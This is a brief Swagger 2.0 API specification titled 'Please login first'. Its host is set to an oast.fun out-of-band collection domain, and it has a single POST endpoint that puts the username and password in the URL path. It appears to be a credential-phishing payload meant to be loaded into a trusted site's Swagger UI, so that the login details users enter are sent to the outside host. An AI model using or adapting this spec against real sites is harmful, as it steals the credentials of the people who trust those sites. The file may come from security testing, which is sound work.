swagger: "2.0"
info:
  version: "v1"
  title: Please login first

host: ces3trk2vtc0000a4bpgg8ct7ccyyyyyb.oast.fun

paths:

  /{Username}/{Password}:
    post:
      summary: Logs in
      parameters:
        - name: Username 
          required: true
          in: path
          type: string
        - name: Password 
          required: true
          in: path
          type: string
      responses:
        200:
          description: Login was successful
